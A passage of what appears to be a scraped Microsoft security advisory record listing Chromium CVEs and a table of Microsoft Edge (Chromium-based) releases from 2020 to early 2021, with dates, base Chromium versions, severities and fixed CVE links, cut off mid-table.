"CVE-2020-6392", "CVE-2020-6387", "CVE-2020-6482", "CVE-2020-6528", "CVE-2020-6563", "CVE-2020-16031", "CVE-2020-15974", "CVE-2020-16030", "CVE-2020-16039", "CVE-2020-6486", "CVE-2020-6412", "CVE-2020-15960", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6407", "CVE-2020-6494", "CVE-2020-6547", "CVE-2020-6529", "CVE-2020-6476", "CVE-2021-21116", "CVE-2020-15999", "CVE-2020-6507", "CVE-2020-6537", "CVE-2020-6416", "CVE-2020-6410", "CVE-2020-6460", "CVE-2020-6560", "CVE-2020-16027", "CVE-2020-16009", "CVE-2020-6461", "CVE-2021-21107", "CVE-2020-6574", "CVE-2020-6479", "CVE-2020-6511", "CVE-2020-6568", "CVE-2020-6386", "CVE-2020-6459", "CVE-2020-15982", "CVE-2020-6542", "CVE-2020-15968", "CVE-2020-6396", "CVE-2020-16002", "CVE-2020-6474", "CVE-2020-6467", "CVE-2020-6383", "CVE-2020-15975", "CVE-2020-6465", "CVE-2020-15985", "CVE-2020-6538", "CVE-2020-6493", "CVE-2020-6550", "CVE-2020-16001", "CVE-2020-6534", "CVE-2020-16023", "CVE-2020-16042", "CVE-2020-16029", "CVE-2020-6437", "CVE-2020-6444", "CVE-2020-15989", "CVE-2020-6451", "CVE-2020-6532", "CVE-2020-6521", "CVE-2021-21109", "CVE-2020-6429", "CVE-2020-6427", "CVE-2020-6536", "CVE-2020-6439", "CVE-2020-15972", "CVE-2020-6385", "CVE-2020-16005", "CVE-2020-6401", "CVE-2019-19926", "CVE-2020-15966", "CVE-2020-16004", "CVE-2020-6535", "CVE-2019-19925", "CVE-2020-16008", "CVE-2020-6455", "CVE-2020-6571", "CVE-2020-6519", "CVE-2020-6414", "CVE-2020-6391", "CVE-2020-6472", "CVE-2020-16016", "CVE-2020-6420", "CVE-2020-6417", "CVE-2020-16041", "CVE-2020-6530", "CVE-2020-6481", "CVE-2020-6431", "CVE-2020-6520", "CVE-2020-6411", "CVE-2021-21106", "CVE-2020-6522", "CVE-2019-19880", "CVE-2020-15963", "CVE-2020-6422", "CVE-2020-16040", "CVE-2020-16034", "CVE-2020-15964", "CVE-2020-6400", "CVE-2020-6398", "CVE-2020-6388", "CVE-2020-6413", "CVE-2020-6555", "CVE-2020-6448", "CVE-2020-6426", "CVE-2020-15973", "CVE-2020-16022", "CVE-2020-15987", "CVE-2021-21112", "CVE-2020-15995", "CVE-2020-15971", "CVE-2019-8075", "CVE-2020-6469", "CVE-2020-6512", "CVE-2020-6449", "CVE-2020-15991", "CVE-2020-6435", "CVE-2020-6489", "CVE-2019-18197", "CVE-2020-6456", "CVE-2020-6567", "CVE-2020-16033", "CVE-2020-6514", "CVE-2019-19923", "CVE-2020-6576", "CVE-2020-6473", "CVE-2020-6543", "CVE-2020-16014", "CVE-2020-6415", "CVE-2020-6539", "CVE-2020-6379", "CVE-2020-6466", "CVE-2020-6423", "CVE-2020-16003", "CVE-2020-16006", "CVE-2021-21115", "CVE-2020-16036", "CVE-2020-6515", "CVE-2021-21111", "CVE-2020-6551", "CVE-2020-6575", "CVE-2020-6488", "CVE-2020-6438", "CVE-2020-6552", "CVE-2020-6441", "CVE-2020-6443", "CVE-2020-6513", "CVE-2020-6380", "CVE-2020-6478", "CVE-2020-15977", "CVE-2021-21113", "CVE-2020-6480", "CVE-2020-6487", "CVE-2020-16013", "CVE-2020-6557", "CVE-2020-6556", "CVE-2020-6523", "CVE-2020-6558", "CVE-2020-16038", "CVE-2020-6505", "CVE-2020-16018", "CVE-2020-16025", "CVE-2020-6442", "CVE-2020-16037", "CVE-2021-21110", "CVE-2020-6404", "CVE-2020-6546", "CVE-2020-6526", "CVE-2020-15990", "CVE-2020-16015", "CVE-2020-6436", "CVE-2020-16028", "CVE-2020-6382", "CVE-2020-6490", "CVE-2020-6406", "CVE-2020-6553", "CVE-2020-6433", "CVE-2020-6402", "CVE-2020-6549", "CVE-2020-6418", "CVE-2020-6496", "CVE-2020-15981", "CVE-2020-6516", "CVE-2020-6450", "CVE-2020-6525", "CVE-2020-6562", "CVE-2020-15961", "CVE-2020-6430", "CVE-2020-6425", "CVE-2020-6527", "CVE-2020-0601", "CVE-2020-6541", "CVE-2020-6440", "CVE-2020-6405", "CVE-2020-6517", "CVE-2020-6384", "CVE-2020-6462", "CVE-2020-6378", "CVE-2020-6471", "CVE-2020-6393", "CVE-2020-6475", "CVE-2019-20503", "CVE-2020-16017", "CVE-2020-15988", "CVE-2020-6470", "CVE-2020-6524", "CVE-2020-6484", "CVE-2020-6531", "CVE-2020-6510", "CVE-2020-6544", "CVE-2020-6457", "CVE-2020-15992", "CVE-2020-15959", "CVE-2020-6495", "CVE-2020-6509"], "description": "**Please note:** Starting 1/21/2021, we will be releasing the Chrome CVEs that are included in the new releases of Microsoft Edge (Chromium-based) directly in the Security Update Guide. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\nThis advisory will be updated whenever Microsoft releases a version of Microsoft Edge (Chromium-based) which incorporates publicly disclosed security updates from the Chromium project. Microsoft will document separately any vulnerabilities in Microsoft Edge (Chromium-based), that are not in Chromium, under a Microsoft-assigned CVE number (see, for example: [CVE-2020-1341](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/cve-2020-1341>)).\n\n**History of Microsoft Edge (Chromium-based) Security Updates**\n\nMicrosoft Edge Version | Date Released | Based on Chromium Version | Highest Severity Fix in Release | CVEs \n---|---|---|---|--- \n87.0.664.75 | 1/7/2021 | 87.0.4280.141 | High | [CVE-2021-21106](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21106>), [CVE-2021-21107](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21107>), [CVE-2021-21108](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21108>), [CVE-2021-21109](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21109>), [CVE-2021-21110](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21110>), [CVE-2021-21111](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21111>), [CVE-2021-21112](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21112>), [CVE-2021-21113](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21113>), [CVE-2021-21114](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21114>), [CVE-2021-21115](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21115>), [CVE-2021-21116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21116>), [CVE-2020-16043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16043>), [CVE-2020-15995](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15995>) \n87.0.664.57 | 12/7/2020 | 87.0.4280.88 | High | [CVE-2020-16037](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16037>), [CVE-2020-16038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16038>), [CVE-2020-16039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16039>), [CVE-2020-16040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16040>), [CVE-2020-16041](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16041>), [CVE-2020-16042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16042>) \n87.0.664.41 | 11/19/2020 | 87.0.4280.66 for Windows and Linux, 87.0.4280.67 for Mac | High | [CVE-2019-8075](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8075>), [CVE-2020-16012](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16012>), [CVE-2020-16014](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16014>), [CVE-2020-16015](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16015>), [CVE-2020-16018](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16018>), [CVE-2020-16022](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16022>), [CVE-2020-16023](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16023>), [CVE-2020-16024](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16024>), [CVE-2020-16025](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16025>), [CVE-2020-16026](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16026>), [CVE-2020-16027](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16027>), [CVE-2020-16028](<https://cve.mitre.org/ci-bin/cvename.cgi?name=CVE-2020-16028>), [CVE-2020-16029](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16029>), [CVE-2020-16030](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16030>), [CVE-2020-16031](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16031>), [CVE-2020-16032](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16032>), [CVE-2020-16033](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16033>), [CVE-2020-16034](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16034>), [CVE-2020-16036](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16036>) \n86.0.622.69 | 11/13/2020 | 86.0.4240.198 | High | [**CVE-2020-16013**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16013>) *, [**CVE-2020-16017**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16017>) * \n86.0.622.68 | 11/11/2020 | 86.0.4240.193 | High | [CVE-2020-16016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16016>) \n86.0.622.63 | 11/4/2020 | 86.0.4240.183 | High | [CVE-2020-16004](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16004>), [CVE-2020-16005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16005>), [CVE-2020-16006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16006>), [CVE-2020-16007](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16007>), [CVE-2020-16008](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16008>), [**CVE-2020-16009**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16009>) *, [CVE-2020-16011](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16011>) \n86.0.622.51 | 10/22/2020 | 86.0.4240.111 | High | [**CVE-2020-15999**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15999>) *, [CVE-2020-16000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16000>), [CVE-2020-16001](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16001>), [CVE-2020-16002](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16002>), [CVE-2020-16003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16003>) \n86.0.622.38 | 10/8/2020 | 86.0.4240.75 | High | [CVE-2020-6557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6557>), [CVE-2020-15968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15968>), [CVE-2020-15969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15969>), [CVE-2020-15971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15971>), [CVE-2020-15972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15972>), [CVE-2020-15973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15973>), [CVE-2020-15974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15974>), [CVE-2020-15975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15975>), [CVE-2020-15977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15977>), [CVE-2020-15979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15979>), [CVE-2020-15981](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15981>), [CVE-2020-15982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15982>), [CVE-2020-15985](<https://cve.mitre.org/cgi-bin/cvenamecgi?name=CVE-2020-15985>), [CVE-2020-15987](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15987>), [CVE-2020-15988](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15988>), [CVE-2020-15989](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15989>), [CVE-2020-15990](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15990>), [CVE-2020-15991](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15991>), [CVE-2020-15992](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15992>) \n85.0.564.63 | 9/23/2020 | 85.0.4183.121 | High | [CVE-2020-15960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15960>), [CVE-2020-15961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15961>), [CVE-2020-15962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15962>), [CVE-2020-15963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15963>), [CVE-2020-15964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15964>), [CVE-2020-15965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15965>), [CVE-2020-15966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15966>) \n85.0.564.51 | 9/9/2020 | 85.0.4183.102 | High | [CVE-2020-6574](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6574>), [CVE-2020-6575](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6575>), [CVE-2020-6576](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6576>), [CVE-2020-15959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15959>) \n85.0.564.41 | 8/27/2020 | 85.0.4183.83 | High | [CVE-2020-6558](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6558>), [CVE-2020-6559](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6559>), [CVE-2020-6560](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6560>), [CVE-2020-6561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6561>), [CVE-2020-6562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6562>), [CVE-2020-6563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6563>), [CVE-2020-6564](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6564>), [CVE-2020-6566](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6566>), [CVE-2020-6567](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6567>), [CVE-2020-6568](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6568>), [CVE-2020-6569](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6569>), [CVE-2020-6570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6570>), [CVE-2020-6571](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6571>) \n84.0.522.63 | 8/20/2020 | 84.0.4147.135 | High | [CVE-2020-6556](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6556>) \n84.0.522.59 | 8/11/2020 | 84.0.4147.125 | High | [CVE-2020-6542](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6542>), [CVE-2020-6543](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6543>), [CVE-2020-6544](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6544>), [CVE-2020-6545](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6545>), [CVE-2020-6546](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6546>), [CVE-2020-6547](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6547>), [CVE-2020-6548](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6548>), [CVE-2020-6549](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6549>), [CVE-2020-6550](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6550>), [CVE-2020-6551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6551>), [CVE-2020-6552](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6552>), [CVE-2020-6553](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6553>), [CVE-2020-6554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6554>), [CVE-2020-6555](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6555>) \n84.0.522.49 | 7/30/2020 | 84.0.4147.105 | High | [CVE-2020-6532](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6532>), [CVE-2020-6537](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6537>), [CVE-2020-6538](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6538>), [CVE-2020-6539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6539>), [CVE-2020-6540](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6540>), [CVE-2020-6541](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6541>) \n84.0.522.40 | 7/16/2020 | 84.0.4147.89 | Critical | [CVE-2020-6510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6510>), [CVE-2020-6511](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6511>), [CVE-2020-6512](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6512>), [CVE-2020-6513](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6513>), [CVE-2020-6514](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6514>), [CVE-2020-6515](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6515>), [CVE-2020-6516](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6516>), [CVE-2020-6517](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6517>), [CVE-2020-6518](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6518>), [CVE-2020-6519](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6519>), [CVE-2020-6520](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6520>), [CVE-2020-6521](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6521>), [CVE-2020-6522](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6522>), [CVE-2020-6523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6523>), [CVE-2020-6524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6524>), [CVE-2020-6525](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6525>), [CVE-2020-6526](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6526>), [CVE-2020-6527](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6527>), [CVE-2020-6528](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6528>), [CVE-2020-6529](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6529>), [CVE-2020-6530](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6530>), [CVE-2020-6531](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6531>), [CVE-2020-6533](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6533>), [CVE-2020-6534](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6534>), [CVE-2020-6535](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6535>), [CVE-2020-6536](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6536>) \n83.0.478.56 | 6/24/2020 | 83.0.4103.116 | High | [CVE-2020-6509](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6509>) \n83.0.478.53 | 6/17/2020 | 83.0.4103.106 | High | [CVE-2020-6505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6505>), [CVE-2020-6506](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6506>), [CVE-2020-6507](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6507>) \n83.0.478.45 | 6/4/2020 | 83.0.4103.97 | High | [CVE-2020-6493](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6493>), [CVE-2020-6494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6494>), [CVE-2020-6495](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6495>), [CVE-2020-6496](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6496>) \n83.0.478.37 | 5/21/2020 | 83.0.4103.61 | High | [CVE-2020-6465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6465>), [CVE-2020-6466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6466>), [CVE-2020-6467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6467>), [CVE-2020-6468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6468>), [CVE-2020-6469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6469>), [CVE-2020-6470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6470>), [CVE-2020-6471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6471>), [CVE-2020-6472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6472>), [CVE-2020-6473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6473>), [CVE-2020-6474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6474>), [CVE-2020-6475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6475>), [CVE-2020-6476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6476>), [CVE-2020-6478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6478>), [CVE-2020-6479](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6479>), [CVE-2020-6480](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6480>), [CVE-2020-6481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6481>), [CVE-2020-6482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6482>), [CVE-2020-6483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6483>), [CVE-2020-6484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6484>), [CVE-2020-6486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6486>), [CVE-2020-6487](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6487>), [CVE-2020-6488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6488>), [CVE-2020-6489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6489>), [CVE-2020-6490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-640>) \n81.0.416.72 | 5/7/2020 | 81.0.4044.138 | High | [CVE-2020-6831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6831>), [CVE-2020-6464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6464>) \n81.0.416.68 | 4/29/2020 | 81.0.4044.129 | High | [CVE-2020-6461](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6461>), [CVE-2020-6462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6462>) \n81.0.416.64 | 4/23/2020 | 81.0.4044.122 | High | [CVE-2020-6458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6458>), [CVE-2020-6459](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6459>), [CVE-2020-6460](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6460>) \n81.0.416.58 | 4/17/2020 | 81.0.4044.113 | Critical | [CVE-2020-6457](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6457>) \n81.0.416.53 | 4/13/2020 | 81.0.4044.92 | High | [CVE-2020-6454](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6454>), [CVE-2020-6423](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6423>), [CVE-2020-6455](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6455>), [CVE-2020-6430](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6430>), [CVE-2020-6456](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6456>), [CVE-2020-6431](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6431>), [CVE-2020-6432](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6432>), [CVE-2020-6433](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6433>), [CVE-2020-6434](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6434>), [CVE-2020-6435](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6435>), [CVE-2020-6436](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6436>), [CVE-2020-6437](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6437>), [CVE-2020-6438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6438>), [CVE-2020-6439](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6439>), [CVE-2020-6440](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6440>), [CVE-2020-6441](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6441>), [CVE-2020-6442](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6442>), [CVE-2020-6443](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6443>), [CVE-2020-6444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6444>), [CVE-2020-6445](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6445>), [CVE-2020-6446](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6446>), [CVE-2020-6447](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6447>), [CVE-2020-6448](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6448>) \n80.0.361.109 | 4/1/2020 | 80.0.3987.162 | High | [CVE-2020-6450](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6450>), [CVE-2020-6451](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6451>), [CVE-2020-6452](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6452>) \n80.0.361.69 | 3/19/2020 | 80.0.3987.149 | High | [CVE-2020-6422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6422>), [CVE-2020-6424](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6424>), [CVE-2020-6425](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6425>), [CVE-2020-6426](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6426>), [CVE-2020-6427](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6427>), [CVE-2020-6428](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6428>), [CVE-2020-6429](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6429>), [CVE-2019-20503](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20503>), [CVE-2020-6449](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6449>) \n80.0.361.66 | 3/4/2020 | 80.0.3987.132 | High | [CVE-2020-6420](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6420>) \n80.0.361.62 | 2/25/2020 | 80.0.3987.122 | High | 